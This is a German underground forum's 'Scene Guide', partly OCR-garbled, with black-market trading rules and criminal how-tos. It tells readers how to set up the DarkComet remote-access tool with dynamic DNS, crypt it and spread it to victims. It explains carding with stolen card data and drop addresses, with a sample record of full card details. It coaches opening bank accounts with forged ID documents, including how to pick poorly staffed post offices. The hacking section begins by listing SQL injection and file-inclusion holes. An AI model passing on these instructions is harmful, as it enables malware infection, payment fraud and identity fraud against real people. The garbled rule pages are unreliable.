- 8asslsLlsche, menschenverachLende, padophlle, rellglonsverachLende, pollLlsch exLreme oder
pornographlsche lnhalLe
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
RussianElite TeamSeite
- 8lppen anderer SlgnaLuren/AvaLare anderer user
- 1lLelfaklng
- Werbung fur andere SelLen/loren
- AfflllaLe Llnks
- verffenLllchung von uumps anderer Szene-loren
- dle verwendung [egllcher u8L-ShorLener (blL.ly, kurzurl.de, ...) zur verschlelerung der Zlel-u8L elnes
Llnks slnd verboLen
4 - 1radlng
ZusaLzllch zu den hler aufgefuhrLen 8egeln, gelLen alle gesonderLen 8lack MarkeL 8egeln aus:
hLLp://russlan-ellLe.neL/showLhread....n-8lack-MarkeL.
4.1 - vendoren
ule "vendoren" slnd genehmlgLe, dauerhafLe verkaufer. ule vendoren zahlen lm MonaL elne
besLlmmLe Cebuhr. ules gewahrlelsLeL kelne 100lge SlcherhelL, bleLeL [edoch elne gewlsse
Crundlage.
4.2 - 8egeln lm 8lack MarkeL
4.2.1 - verboLe
- Pandeln auerhalb des 8lack MarkeLs
- falsche lormaLlerungen (slehe unLen)
- harLe urogen und Schusswaffen
- Anfragen nach LssensbesLellungen (bel AnbleLern, wle lleferando.de, lleferheld.de, plzza.de, ...)
- Lockerz
- 8ufmord sowle 8lppermeldungen CPnL 8ewelse (ScreenshoLs)
- l1rader fur lree Sachen
- uerungen von unbeLelllgLen ln 8lpperLhreads
AngeboLe bzw. Anfragen werden bel 8eansLandung unverzugllch gelschL oder verschoben.
4.2.2 - korrekLe lormaLlerung und 1hread ushes
uer 1lLel des 1rade-1hreads muss konkreLe Angaben enLhalLen. ule CpLlonen (8leLe, Suche) mussen
gro geschrleben werden! Sle slnd mlL ecklgen klammern zu umschlleen. Slehe hlerzu 8usslan LllLe
SLyle Culde.
LrlaubL: [8] SLeam, ayal, Amazon
LrlaubL: [S] SLeam, ayal, Amazon
nlchL erlaubL: [b] SLeam, ayal, Amazon
nlchL erlaubL: (8) SLeam, ayal, Amazon
nlchL erlaubL: (b) SLeam, ayal, Amazon
nlchL erlaubL: [s] SLeam, ayal, Amazon
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
RussianElite TeamSeite
nlchL erlaubL: (S) SLeam, ayal, Amazon
nlchL erlaubL: (s) SLeam, ayal, Amazon
nlchL erlaubL: [S] Celd
Lln 1hreadpush lsL nur aller 24 SLd. erlaubL. nach dem 1raden blLLe unaufgeforderL elne
l1rader-8ewerLung hlnLer lassen!
4.2.3 8u und ueblL verkauf
uer verkauf von 8us und ueblLkarLen lsL auf max. eln SLuck zu begrenzen.
8edeuLeL eln verkauf, leedback durch kaufer, ersL dann darf wleder eln 8u oder elne ueblL verkaufL
werden.
4.2.4 1reuhand
ulglLale 1reuhandzahlungen slnd ln der 8egel ln llbetty kesetve oder webmooey zu lelsLen. ln guL
begrundeLen Ausnahmefallen kann ggf. ln Absprache mlL dem 1reuhander dle Zahlung ln ukash
gelelsLeL werden.
1reuhandpf||cht|ge Art|ke|
uer verkauf von "laked S" lsL zwlngend LreuhandpfllchLlg. Lln AngeboL ohne 1reuhand lsL damlL
nlchL zulasslg.
3 - 8efrderungen
ule vorrausseLzungen elne MlLglledschafL lm n 8erelch werden nlchL bekannL gegeben.
6 - Abschlleende lnfos
Als 1eammlLglleder dleses lorums haben wlr das 8echL, [ederzelL folgende ulnge ohne eure
8esLaLlgung durchzufuhren:
- uas LnLfernen oder LdlLleren aller 8elLrage.
- uas Sperren, ueakLlvleren oder Lschen von AccounLs.
- uas verandern der 8oardregeln zu [eder ZelL.
1LIL 2 8 (8|ackmarket kege|n)
wos lst elo 8lockmotket? nlet wetJeo woteo/uleostlelstooqeo qetooscbt, vetkooft oJet qebooJelt.
1. 1rusLlng
vlrLuelle Waren (z.8. 1uLorlals, Shops, Accs, LlsLen) knnen von unseren Admlns und Mods geLrusLeL
werden.
SollLe eLwas LrusLeL seln wlrd lm 1hread darauf hlngewlesen.
1uLorlals und Shops MuSSLn geLrusLeL werden. SollLen wlr sehen das eln 1uL oder Shop ohne 1rusL
verkaufL wlrd erfolgL eln 8ann.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
RussianElite TeamSeite
2. verkauf
Ls durfen nur maxlmal funf ArLlkel pro Warengruppe angeboLen werden. ClelchzelLlg darf eln
MlLglled maxlmal 3 verkaufsLhreads ohne elne vendorllzenz erffnen.
Wenn das nlchL beachLeL wlrd, wlrd elne verwarnung erLellL.
uer verkauf von urogen lsL nur vendoren erlaubL.
3. 1reuhand
3.1 Allgemeln
1reuhand lsL kosLenlos. Ausgenommen bel besonders hochwerLlgen Waren und wenn der Admln
oder S-Mod dafur Wege zu erledlgen haL.
Wer 1P nuLzen wlll schrelbL elnen Admln oder S-Mod an und kommL glelch zur Sache keln Small 1alk.
Alle 8eLrage deren WerL uber 200t llegen werden nu8 von 8C8Z, WL8nL8, $yM8lCS und ALLxL!
durchgefuhrL. Plerbel lsL nur eln Admln glelchzelLlg anzuschrelben.
3.2. ukash und 1reuhand
ua man ln leLzLer ZelL vermehrL von zuruck geholLen oder lnvallden ukash hrL,
werden wlrd nur noch LlberLy 8eserve und Webmoney als 1P-Wahrung akzepLlerL.
ukash kann ggf. ln Absprache mlL dem 1reuhandler auf elgenes(!) 8lslko alLernaLlv hlnLerlegL werden.
3.3 1reuhandpfllchLlge ArLlkel
uer verkauf von "laked S" lsL zwlngend LreuhandpfllchLlg. Lln AngeboL ohne 1reuhand lsL damlL
nlchL zulasslg.
4. Celdversand per M
Summen uber 30 Luro durfen nur versendeL werden, wenn der verkaufer onllne lsL.
LassL euch besLaLlgen, ob lhr senden knnL.
AnsonsLen auf elgenes 8lslko - wlr hafLen nlchL!
3. 1raden lsL nur lm MarkLplaLz erlaubL. und dles ersL ab 23 osLs und 3 1agen 8eglsLrlerung.
6. Waffen (auch Cas) und andere szenefremde ArLlkel
Ls werden hler kelne Waffen gehandelL. Clelches gllL fur Cas Schusswaffen und MunlLlon, sowle
andere Waffen und lnsLrumenLe um dle verLeldlgungsfahlgkelL elnes Menschen herabzuseLzen.
Clelches gllL fur szenefremde ArLlkel.
7. 8u verkauf
uer verkauf von 8us(auch ueblLs) lsL ab [eLzL auf max.1 SLuck zu begrenzen.
8edeuLeL 1 verkauf, leedback und ersL dann darf wleder 1 8u verkaufL werden.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
RussianElite TeamSeite
1LIL 2 C (Sty|egu|de)
1 1hread-1|te|
1.1 1hread-1|te| |m 8|ack Market
um dle LesbarkelL und uberslchLllchkelL zu erhhen, haben 1hread-1lLel lm 8lack MarkeL aufgebauL
zu seln nach dem Schema:
[8] CuL 1, CuL 2, ... [S] CuL 1, CuL 2, ...
uaraus ergeben slch folgende 8egeln:
- dle 8uchsLaben "8" und "S" slnd zwlngend ln ecklge klammern zu seLzen (-> runde klammern slnd
falsch)
- auf dle schlleende ecklge klammer, haL eln Leerzelchen zu folgen (8sp. "[8] CuL 1" = rlchLlg,
"[8]CuL 1" = falsch)
1.2 Sonst|ge 1hread-1|te|
- kosLenlose AngeboLe mlL "[lree]" lm 1lLel beglnnen, falls kredlLkarLendaLen verffenLllch werden,
blLLe erganzL um uaLum ln klammern, z8. "[lree] 10x uL CC (22.11.11.)"
- LlsLen- oder SammelLhreads mlL "[Sammlung]" lm 1lLel beglnnen
- Cesuche auerhalb des 8lack MarkeLs mlL "[S]" lm 1lLel beglnnen
- 8lpper-8eporLs blLLe mlL "[8lpper]" lm 1lLel beglnnen
- 1hreads ln denen andere Medlen zlLlerL werden, bspw. belm osLen von ZelLungsarLlkeln oder
8logbelLragen haben mlL "PerkunfLsmedlum: ..." zu beglnnen, 8elsplele: "Pelse: Packer zersLrL ..."
oder "8aslc 1hlnklng: CnllnekrlmlnallLaL auf neuem ..."
2 L|nhe|t||che Abkrzungen
L-Currencles
- ukash voucher: "ukash" (-> "ukash" und "ukash" = falsch)
- aySafeCard voucher: "SC"
- ayal: ""
- LlekLronlsches LasLschrlfLverfahren: "LLv"
- Webmoney: $-konLo: WMZ, Luro-konLo: WML
Lander
- 2 8uchsLaben, belde gro
- 8sp.: "uL" und "uA" = rlchLlg, "ue", "cz" und "8uS" = falsch
SonsLlges
- AccounLs: "Accs"
- "e8ay", nlchL "Lbay" oder "e8A?"
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
RussianElite TeamSeite
- acksLaLlon: "S", nlchL "Sn"
- es gelLen alle Abkurzungen aus dem Clossar
3 Sonst|ges
- der engllsche lural wlrd ohne AposLroph geblldeL, 8sp: "CCs" und "packs" = rlchLlg, "CC's" und
"pack's" = falsch
- korrekLe Cro- und klelnschrelbung ln allen 1hread-1lLeln und 8elLragen lsL zu beachLen (1lLel wle
"C8CLS uA1LnLCCP 8Ll Anu8Clu" slnd nlchL zulasslg)
(c)holy (c)holy (c)holy (c)holy (c)holy
(c)holy (c)holy
(c)holy
Scene Guide Teil 3
by holy

"rippen & gerippt werden"

In der Scene ist es heutzutage alltglich, dass man Flle von Scenebetrug
aufdeckt. Meist handelt es sich hierbei um kleine Ripps wie 20-200 ukash/lr,
jedoch teilweise auch um Waren mit hohen Wert.

Doch wie schtzt man sich vor diesen Angriffen?...

1. Tipps fr Verkufer
Als Verkufer msst ihr beachten, dass eure Ware/Dienstleistung normaler
Weise zuerst kommen muss. Denn Wer bezahlt normal etwas, ohne eine
Leistung bekommen zu haben. Aus diesem Grund gibt es das Treuhand
verfahren, indem ihr dem Kunden die Mglichkeit bietet, sein Geld einem
Russian-Elite Teammitglied das Geld zu Hinterlegen, welches erst nach
erbrachter Leistung laut Abmachung weitergeleitet wird.

2. Tipps fr Kufer
Wie oben beschrieben solltet ihr als Kunden von Anfang an auf einen
Treuhandel bestehen. Sollte dies nicht vereinbart sein, oder der Verkufer
ablehnt, wendet euch an ein Teammietglied, welches den betroffenen Hndler
anspricht.

3. Was soll ich als Opfer eines Ripps erledigen? Gibt es Rckerstattung?
Zuerst solltet ihr einen Thread erffnen, die Vorgegebene Form ist bereits im
Teil 2 (Styleguide) enthalten. Dort belegt ihr mit Beweisen (Screenshots) den
Betrugsfall und wartet auf weitere Anweisungen durch ein Teammitglied.

Merke: Die Wenigsten user wissen, dass das anbieten von Treuhand fr
Verkufer ohne Vendoren-Titel Pflicht ist.
(c)holy (c)holy (c)holy (c)holy (c)holy
(c)holy (c)holy
(c)holy
Scene Guide Teil 3
by holy

"RATS das groe HOWTO"

Die meisten Einsteiger der Scene stellen Fragen ber Fragen zu dem Thema
RATS. In den folgenden Seiten erlutere ich euch wie ihr diese benutzt. Was
RATS eigentlich sind, und woher ihr diese beziehen knnt.

Was sind eigentlich RATS?
Die Fernwartungssoftware (engl. Remote Administration Tool fr wrtlich
bersetzt entferntes Verwaltungswerkzeug) stellt eine Anwendung des
Konzeptes Fernwartung fr beliebige Rechner oder Rechnersysteme dar. Sie
wird in der Regel genutzt, um sich von entfernten Orten auf anderen Rechnern
anzumelden, um diese fr Reparatur- oder Wartungsarbeiten
fernzusteuern. Diese werden in der Scene als Diebstahl oder Betrugsmittel zur
Erpressung von Opfern eingesetzt.

Es sind zum Beispiel folgende Aktionen mglich:
Bildschirmerfassung (Bildschirmfoto)
Dateiverwaltung (Hoch- und Runterladen, Umbenennen und Erstellen
von Dateien usw.)
Kontrollieren
Registrierungsverwaltung
andere Funktionen






(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Aufbau der Verbindung zum Opfer:

[Client (Opfer) ]
| [Client (Opfer) ]
| /
| /
| /
| /
[Server (RAT)]


Vorbereitung zum einrichten einer RAT
Um eine RAT sicher einzurichten bentigt man zuerst eine sogenannte DNS.
Das DNS ist ein weltweit auf tausende von Servern verteilter hierarchischer
Verzeichnisdienst, der den Namensraum des Internets verwaltet. Dieser
Namensraum ist in so genannte Zonen unterteilt, fr die jeweils unabhngige
Administratoren zustndig sind. Fr lokale Anforderungen etwa innerhalb
eines Firmennetzes ist es auch mglich, ein vom Internet unabhngiges DNS
zu betreiben.
Hauptschlich wird das DNS zur Umsetzung von Domainnamen in IP-Adressen
(forward lookup) benutzt. Dies ist vergleichbar mit einem Telefonbuch, das
die Namen der Teilnehmer in ihre Telefonnummer auflst. Das DNS bietet
somit eine Vereinfachung, weil Menschen sich Namen weitaus besser merken
knnen als Zahlenkolonnen. So kann man sich einen Domainnamen wie
example.org in der Regel leichter merken als die dazugehrende IP-Adresse
192.0.32.10. Dieser Punkt gewinnt im Zuge der Einfhrung von IPv6 noch an
Bedeutung, denn dann werden einem Namen jeweils IPv4- und IPv6-Adressen
zugeordnet. So lst sich beispielsweise der Name www.kame.net in die IPv4-
Adresse 203.178.141.194 und die IPv6-Adresse
2001:200:0:8002:203:47ff:fea5:3085 auf.
Ein weiterer Vorteil ist, dass IP-Adressen etwa von Web-Servern relativ
risikolos gendert werden knnen. Da Internetteilnehmer nur den
(unvernderten) DNS-Namen ansprechen, bleiben ihnen nderungen der
untergeordneten IP-Ebene weitestgehend verborgen. Da einem Namen auch
mehrere IP-Adressen zugeordnet werden knnen, kann sogar eine einfache
Lastverteilung per DNS (Load Balancing) realisiert werden.
Mit dem DNS ist auch eine umgekehrte Auflsung von IP-Adressen in Namen
(reverse lookup) mglich. In Analogie zum Telefonbuch entspricht dies einer
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Suche nach dem Namen eines Teilnehmers zu einer bekannten Rufnummer,
was innerhalb der Telekommunikationsbranche unter dem Namen Inverssuche
bekannt ist.
DNS zeichnet sich aus durch:
dezentrale Verwaltung,
hierarchische Strukturierung des Namensraums in Baumform,
Eindeutigkeit der Namen,
Erweiterbarkeit.
In unserem Beispiel nutzen wir den DNS-Service von NO-IP.
https://www.no-ip.com


1. Schritt: Registrieren (keine Erluterung Ntig)
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Tragt eure Daten na
3.Schritt Ladet euch





2.Schritt: Host einrichten

nach Wunsch ein, nur Ip msst ihr eure a

euch das No-Ip tool (zum Download auf de




re angeben.
f der Seite)
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
So, da ihr nun eure DNS habt, kommen wir zur RAT. Es gibt verschiedene RATs
die genutzt werden knnen. Wir nutzen darkcomet.

Schritt1: Die Rat auf http://www.darkcomet-rat.com/ downladen.
Schritt2: Startes darkcomet, geht auf Settings und richtes alles auf
Wunschsettings ein, dabei knnt ihr nichts falsch machen. Das einzige
Augenmerk sollte bei den Netzwerk Settings liegen. Beachtet hier, dass ihr bei
eurem VPN, einen Port freigeben msst (in Teil 1 der Guide erklrt). Bei Ip-
Adresse gebt ihr euern No-Ip DNS-Hostnamen ein (der No-Ip Client muss
laufen)

Jetzt habt ihr euern RAT-Server, diesen knnt ihr euch bei sogenannten Crypt-
Service Anbietern auf Russian-Elite crypten lassen und bei sogenannten Spread-
Service Anbietern ins Netz spreaden lassen.

Nun heit es Abwarten und Kiffen, bis die ersten Opfer eurern Server
downloaden und starten.


Darkcomet-Screens:
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy




Viel spa
holy

(c)holy (c)holy (c)holy (c)holy (c)holy
(c)holy (c)holy
(c)holy
Scene Guide Teil 5
by holy

Carding & CCs

Unter dem Begriff Carding, verstehen wir in diversen Shops Ware an unsere
Hausdrops oder Packstationen zu schicken.

Was braucht man zum carding:
-CC am besten visa mit vbv Setzbar (50+)
-Packstation mit GC smsOFF mailzugang (40+)
-Np Shop (20+)

Legen wir mal los, Ihr carded indem ihr auf dem Shop einen Account einrichtet,
dabei achtet ihr darauf, dass der Name und die Anschrift auf euren CC Inhaber
abgestimmt ist. Bei manchen shops muss es auch der PS/HD Inhaber sein, das
msst ihr dann Testen. Ihr sucht euch einen Artikel, am besten bis 800 pro CC
& Account. Als Lieferanschrift gebt ihr eure Ps/Hd Dropaddy an. Fllt einfach
das Bezahlungsformular aus und wartet auf eure VSB.

Beim Thema Carding gibt es nicht wirklich viel zu Erleutern, einfache Formulare
ausfllen und auf Ware warten. Die grte Rolle hierbei spielt die Anonymitt,
welche im Teil1 bereits genauestens erlutert wurde.

Was ihr ber CCs wissen solltet by Heimertrade

Kreditkarten FAQ


Allgemein:

Eine Kreditkarte ist eine Karte zur Zahlung von Waren und Dienstleistungen.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Die meisten Kreditkarten sind weltweit einsetzbar, sowohl im realen tglichen
Geschfts- wie Privatleben als auch bei Online-Geldtransaktionen.
Sie wird im Fall von MasterCard oder Visa von Banken in Zusammenarbeit mit
den Kreditkartenorganisationen ausgegeben,
oder im Falle von Diners und American Express direkt von der
Kartengesellschaft.
Diese vier Gesellschaften teilen sich nahezu den gesamten europischen
Kreditkartenmarkt.
Der Name Kreditkarte entstand aus der Tatsache, dass Kreditkarten dem
Karteninhaber oftmals einen Kredit gewhren.


Kreditkartentypen:

International ausgegeben:

- American Express (seit 1958 in Deutschland)
- Diners Club (seit 1954 in Deutschland)
- MasterCard (seit 1975 in Deutschland; frher in Europa Eurocard)
- Visa (seit 1980 in Deutschland)


Kartendaten:

Kartennummer: eindeutige Identifikationsnummer mit blicherweise 16
(American Express: 15) Stellen, sichtbar auf der Vorderseite und elektronisch
gespeichert auf dem Magnetstreifen bzw. Chip.

Die ersten sechs Ziffern bilden den BIN-Code.
Die ersten 4 Ziffern stehen fr die Kreditkartengesellschaft.
Die 5. Ziffer steht fr die Kreditkartenart (z. B. bei American Express: blau, grn,
gold, platin).
Die 6. Ziffer dafr, ob es sich um eine Zweitkarte, Partnerkarte, Firmenkarte
etc. handelt.
Die restlichen 10 Ziffern sind die Kontonummer mit der letzten Ziffer als
Prfziffer (nach dem Luhn-Algorithmus).
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy

Verfallsdatum: Monat und Jahr, sichtbar auf der Vorderseite (zustzlich auf
dem Magnetstreifen bzw. Chip gespeichert). Die Karte ist bis zum letzten Tag
dieses Monats gltig.
Unterschrift: sichtbar auf der Rckseite (nicht geprgt, nicht auf dem
Magnetstreifen gespeichert, sondern vom Karteninhaber in ein vorgesehenes
Feld zu setzen)
Kartenprfnummer (CVC2 oder CVV2): auf der Rckseite sichtbar, aber weder
geprgt noch elektronisch auf dem Magnetstreifen gespeichert

BIN-Code:

Die Bank Identification Number (BIN) wird zur Identifikation von Kredit- und
Debitkarten beim Routing innerhalb von Geldautomaten-Netzen verwendet.
Anhand der BIN kann der verwendete Kartentyp und der Karten-Issuer (also die
Bank, die die Karte herausgegeben hat) identifiziert werden.
Obwohl eine BIN internationale Gltigkeit besitzt, werden fr
Auslandsberweisungen andere Bankidentifikationsnummern eingesetzt: Die
International Bank Account Number und der SWIFT-Code.
Grnde dafr liegen auf der Hand: berweisungen sind nicht zwingend an eine
Karte, sondern eher an Konten gebunden.
Auerdem haben Banken meistens mehrere BIN-Codes, fr jeden angebotenen
Kartentyp eine.


3-D Secure:

3-D Secure ist ein Verfahren das fr zustzliche Sicherheit bei Online-
Kreditkartentransaktionen eingesetzt wird.
Es wurde von der Kreditkartenorganisation VISA entwickelt und wird unter dem
Namen Verified by Visa angeboten.
Unter dem Namen MasterCard SecureCode bietet auch MasterCard diesen
Dienst an.
Mit 3-D Secure sollen das Betrugsrisiko und der Ausfall von Zahlungen durch
Kartenmissbrauch reduziert werden.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Zudem wird den Shop-Betreibern, die 3-D Secure einsetzen, der
Zahlungseingang garantiert.



Format der in der "Scene" verkauften Kreditkarten:

Das Format variiert von Verkufer zu Verkufer.

Example:

Code:
Jrgen | Sander | Miltenberger Str. 11f | 04207 | Leipzig | DE | 21 | 07 | 1954
| 1002966453 | 4998970080866171 | 531 | 06 | 15 | Heimat1Erde
Aufbau:

Code:
Vorname | Nachname |Strae | PLZ | Ort | Landeskennung | Tag | Monat
|Jahr (Dob) | Abrechnungskonto | Kreditkartennummer |CVV2 | Ablaufmonat
|Ablaufjahr | Securecode
Kreditkartentypen die in der "Scene" verkauft Werden:

CC + SC (Kreditkarte + Securecode)

Hier erhalten Sie meist einen vollstndigen Datzensatz +
Kreditkarteninformationen und den passenden Securecode, mit solchen
Kreditkarten kann in "jeden" Shop bezahlt werden.

CC + SC setzbar

Hier erhalten Sie meist einen vollstndigen Datzensatz +
Kreditkarteninformationen und die bentigen Informationen um den
Securecode zu erstellen oder zurckzusetzen, mit solchen Kreditkarten kann in
"jeden" Shop bezahlt werden.

CC Non VBV
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy

Diese Kreditkarten haben keinen Securecode aber nicht alle Shops akzeptieren
solche Kreditkarten

Random CC

Bei diesen Kreditkarten wird der Securecode nicht mitgeliefert, weil er nicht
bekannt ist und/oder nicht erstellt werden kann. Mit solchen Kreditkarten kann
man nur bei wenigen Shops bezahlen, wie z.B Amazon,Itunes.




mfg holy&Heimertrade

(c)holy (c)holy (c)holy (c)holy (c)holy
(c)holy (c)holy
(c)holy
Scene Guide Teil 6
by holy

Das PostIdent Verfahren und was ihr
beachten msst!

Die Grundlagen fr das Thema sind erffnen eines Bankdops mit einem faked
Personalausweis.


Welche Dokumente brauche ich?


Da ihr ein Bankkonto erffnet wollt, solltet ihr euch als erstes einen faked Perso
besorgen.
Dieser sollte in der Qualitt natrlich nicht einer der schlechtesten sein. Ich
empfehle euch zudem einen Auslndischen Personalausweis zu kaufen, da
dieser nicht so bekannt sein wird und es eventuell nicht so stark auffallen wird
wenn einige Sicherheitsmerkmale fehlen.
Solltet ihr euch fr einen Auslndischen Personalausweis entscheiden, msst
ihr euch zudem eine Meldebescheinigung faken lassen.
Diese sollte natrlich auf die Daten eures BKD erstellt werden.
Dann msst ihr euch natrlich noch die Formulare der Bank ausdrucken und
ausfllen.








(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Was ist PostIdent?


Das Postident-Verfahren ist eine Methode der sicheren persnlichen
Identifikation von Personen, die durch die Mitarbeiter der Deutschen Post AG
vorgenommen wird. (Wikipedia).
Bedeutet kurz, die Post berprft ob ihr auch wirklich die Person seid die ein
Konto erffnen will.


Wie luft das PostIdent - Verfahren genau ab?


Da wir davon ausgehen, dass ihr ein Bankkonto erffnen wollt, habt ihr euch
vorher die Formulare der Bank ausgedruckt und vollstndig ausgefllt.
Das letzte Blatt ist meistens der PostIdent Coupon.
Auf diesem steht eine Nummer, welcher der interne PostIdent Code ist.
Diesen bentigt die Post um euren "Auftrag" zu zu ordnen.
Ihr nehmt die aufgefllten Bltter und das Blatt mit dem Coupon mit in eine
Post Filiale.
Dort gebt ihr einem Post Mitarbeiter das Blatt mit dem Coupon und euren
Ausweis, dieser fllt dann am Computer ein separates Formular auf die Daten
eures Ausweises aus.
Dieses wird dann dem Internen PostIdent Code zugeordnet und ausgedruckt,
zudem msst ihr das Formular noch unterschreiben.
Der Mitarbeiter wird nun dieses Formular und die von euch vorher ausgefllten
Bank Formulare in einen Umschlag stecken und direkt zu der Bank schicken.
Der Porto und die Umschlge sind inklusive.


Wie finde ich die richtige Post?


Unter anderem ist die Auswahl der Post, in der ihr euer PostIdent verfahren
macht, von entscheidender Bedeutung.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Bei einer etwas schlechteren Ausweisqualitt msst ihr hier besonderen Wert
drauf legen.
Ihr solltet aufjedenfall eine Post in der nchsten Stadt nehmen, also nicht direkt
in eurem Wohnort.
Ideal sind Poststellen die in anderen Geschften sind, Lotto, Edeka,
Tabakwaren, etc.
Dort wird meistens alleine gearbeitet und man findet dort meistens schlechter
geschulte Mitarbeiter.
Um solche Posten zu finden besuchen wir folgende Seite:

Klick

Tragt dort die PLZ von dem ausgewhlten Ort/Stadt ein und klickt auf suchen.
Je nach Gre der Stadt werdet ihr jetzt mehr oder weniger Zeichen auf der
Karte sehen.
Die Zeichen mit der Beschriftung VP interessieren uns nicht, diese verkaufen
nur Briefmarken und Umschlge.
Ihr klickt nun jedes Symbol mit einem Posthorn durch.

Notiert euch alle Posten die folgendes erfllen:

- Hinter dem Namen Postfiliale steht (im Einzelhandel) (Dies bedeutet die Post
ist IN einem anderen Laden)
- Unter Leistungen muss zudem der Punkt - PostIdent aufgefhrt sein.

Hufig knnt ihr anhand der Adresse schon den Namen des Ladens heraus
lesen in dem sich die Post befindet. z.b. Tabakwaren Schrell.
Je nach Stadt knnt ihr nun die Adresse in Google Maps eingeben und euch
ber StreetView die genaue Lage + Geschft anschauen.
Ich empfehle euch jede Post vorher einmal an zu fahren und euch diese
genauer an zu schauen.
In welchem Laden ist die Post?
Wie gro ist der Laden?
Wie viele Mitarbeiter arbeiten dort?
Viel besucht?

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Im Idealfall sollte der Laden nicht zu gro und wenig besucht sein.
Die Post sollte mit nur einer Person besetzt sein.
Am besten mit lteren Mitarbeitern 45+.
Ob Frau oder Mann egal.

Habt ihr nun die optimale Post gefunden geht es weiter.


Wie bereite ich mich auf den PostIdent vor?


Am wichtigsten ist, dass ihr die Daten eures Ausweises und BKD AUSWENDIG
kennt!
Name - Vorname - Geburtstag - Strae - PLZ - Geburtsort - Alter - etc.
berlegt euch eine Vergangenheit.
Nehmt die neue Identitt an und kennt sie wie eure eigene.
Nicht ist schlimmer als Unsicherheit!
Nehmt euch ein neues Portemonnaie, tut dort euren faked Ausweis, etwas
Geld, evtl ein paar Kassebongs, Karten etc. hinein.
So das es echt aussieht.
Nehmt die Meldebescheinigung und die Formulare der Bank und fahrt zu der
ausgewhlten Post!


Wie verhalte ich mich whrend dem PostIdent?


Atmet vorher nochmal tief durch und betretet dann die Post.
Verhaltet euch so als ob es etwas ganz normales ist. Dies ist es ja eigentlich
auch.
Versucht nicht nervs oder angespannt zu wirken.
Zudem rate ich euch von Mtzen, Brillen, Schaals etc. ab.
Dies erregt meistens nur aufsehen. Zudem werden die Videoaufnahmen nur bis
zu 14 Tagen gespeichert.
Geht nun einfach locker zum Mitarbeiter und sagt ihr wollt ein PostIdent
verfahren durch fhren.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Er wird euch nach eurem Ausweis und dem Coupon fragen. Gebt ihm erst den
Coupon und holt dann den Ausweis IN DEM Portemonnaie heraus. Nichts
kommt unglaubwrdiger als jemand der mal eben so seinen Ausweis lose aus
der Hosentasche zieht...
Dazu knnt ihr direkt die Meldebescheinigung heraus holen und sage, diese
habe ich zur Sicherheit mitgebracht.
Der Mitarbeiter wird den Coupon nun erstmal in den Computer eingeben und
sich DANN den Ausweis anschauen.
Nun ist das A und O SMALTALK!
Einfacher, langweiliger und witziger Smaltak bewirkt wunder.
Redet mit ihm ber das schne Wetter, wann er Mittagspause hat, ob die Post
hier neu ist, Angebote der Post, was wei ich.
Hauptsache er ist etwas abgelenkt und baut "Vertrauen" zu euch auf.
Bei meinem PostIdent habe ich mit dem Mitarbeiter Witze gemacht und wir
haben zusammen gelacht.
So sollte alles eigentlich ohne Probleme klappen und am ende bekommt ihr
Meldebescheinigung und Ausweis wieder.
Der Mitarbeiter behlt dann die Formulare und druckt seinen Ausgefllten
Bogen aus und wird dies direkt zu Post schicken. Ihr verabschiedet euch und
verlasst die Post.

Ihr solltet jedoch auch immer mit dem negativen Beispiel rechnen!
Der Mitarbeiter wird stutzig und erkennt evtl. die Flschung.
Dann gibt es nur noch eine Mglichkeit! FLUCHT!.
Evtl. schafft ihr es noch euren Ausweis wieder zu bekommen. Zur Not reist ihm
den aus der Hand.
Und dann solltet ihr so schnell es geht das Weite suchen!
Rennt um euer leben!!
Das wre dann ein ziemlicher epic fail!
Dann solltet ihr das nchste mal entweder in einen besseren Ausweis
investieren, oder euch besser vorbereiten.

Schlusswort

Wenn ihr alle Punkte, die ich euch genannt habe beachten, sollte eigentlich
nichts schief gehen.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
Doch es gibt wie berall im Leben ein gewisses Restrisiko.
Bereitet euch gut auf ein PostIdent vor und versucht dies nicht alles innerhalb
von 1-2 Tagen ber die Bhne zu bekommen.
Vorbereitung ist die halbe Miete.





Gre,
R3volution


P.S. Ein riesen Dank geht an Joumangy! (Urheber)
(c)holy (c)holy (c)holy (c)holy (c)holy
(c)holy (c)holy
(c)holy
Scene Guide Teil 7
by holy

SQLI

1. Was fr Lcken sind i.d.R. am besten zu finden

- SQLI: Ja SQLI Lcken sind natrlich super zu nutzen, da wir damit "Zugang" zur
Datenbank erhalten
- XSS: Meist schnell zu finden, aber oft nicht wirklich effektiv nutzbar
- LFI: Dateien vom Server einbauen/downloaden? Praktisch und super nutzbar
- RFI: Dateien von eurem Server einbinden und somit z.B. eine Shell ausfhren.


1.2. Wie Variablen bergeben werden

Ich beschreibe auch hier wieder nur die typischen bertragungswege von User-
Input. Es gibt noch mehr, aber das lasse ich mal auen vor: POST, GET, COOKIE,
HEADER. Vergesst KEINEN einzigen dieser bertragungswege von Schadcode.


2. Wie finde ich Lcken

Lcken lassen sich letztendlich auf nur 2 Arten finden. Man kann Tools
